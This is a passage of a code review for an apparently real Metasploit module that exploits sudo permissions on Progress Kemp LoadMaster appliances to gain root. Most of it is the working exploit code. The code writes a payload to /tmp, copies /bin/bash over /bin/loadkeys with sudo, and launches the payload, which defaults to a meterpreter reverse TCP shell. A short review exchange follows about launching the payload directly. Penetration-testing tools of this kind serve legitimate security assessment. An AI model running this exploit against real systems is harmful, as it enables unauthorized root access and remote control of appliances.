modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb

```diff
@@ -0,0 +1,101 @@
+          executable.
+        },
+        'Author' => [
+          'Dave Yesland with Rhino Security Labs',
+          'bwatters-r7' # module,
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
+          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']
+        ],
+        'DisclosureDate' => '2024-03-19',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' => [['Automatic', {}]],
+        'Privileged' => true,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),
+      OptString.new('BINARY_RENAME', [true, 'The temporary name to use to store the TARGET_BINARY.', '/tmp/' + Rex::Text.rand_text_alpha(5..9) ]),
+      OptString.new('TEMP_PAYLOAD', [true, 'The temporary name to use to store the payload.', '/tmp/' + Rex::Text.rand_text_alpha(5..9) ]),
+    ])
+  end
+
+  def check
+    score = 0
+    score += 1 if read_file('/usr/wui/index.js').include?('KEMP')
+    score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')
+    score += 1 if exists?('/usr/wui/eula.kemp.html')
+    vprint_status("Found #{score} indicators this is a KEMP product")
+    return CheckCode::Detected if score > 0
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    vprint_status("Delete #{datastore['BINARY_RENAME']}")
+    if exists?(datastore['BINARY_RENAME'])
+      fail_with(Msf::Module::Failure::BadConfig, "#{datastore['BINARY_RENAME']} exists on host; chose another name.")
+    end
+    if exists?(datastore['TEMP_PAYLOAD'])
+      fail_with(Msf::Module::Failure::BadConfig, "#{datastore['TEMP_PAYLOAD']} exists on host; chose another name.")
+    end
+
+    begin
+      vprint_status("Saving payload as #{datastore['TEMP_PAYLOAD']}")
+      write_file(datastore['TEMP_PAYLOAD'], generate_payload_exe)
+      chmod(datastore['TEMP_PAYLOAD'])
+      register_file_for_cleanup(datastore['TEMP_PAYLOAD'])
+
+      vprint_status("Moving #{datastore['TARGET_BINARY']} to #{datastore['BINARY_RENAME']}")
+      cmd_exec("sudo /bin/cp #{datastore['TARGET_BINARY']} #{datastore['BINARY_RENAME']}")
+
+      vprint_status("Moving /bin/bash to #{datastore['TARGET_BINARY']}")
+      cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}")
+
+      vprint_status('Launching payload')
+      cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}")
```

Comment:
Why use `/bin/bash` to launch the payload, instead of launching it directly?

Reply:
You're right.  I had played with it earlier, and it did not seem to work.  I think my problem was that I was trying to directly copy, and I did not have the privileges to overwrite it directly, and needed to put the file in a temp location, then sudo cp the file over /bin/loadkeys.  Switched to that, now, unless we're running a command payload.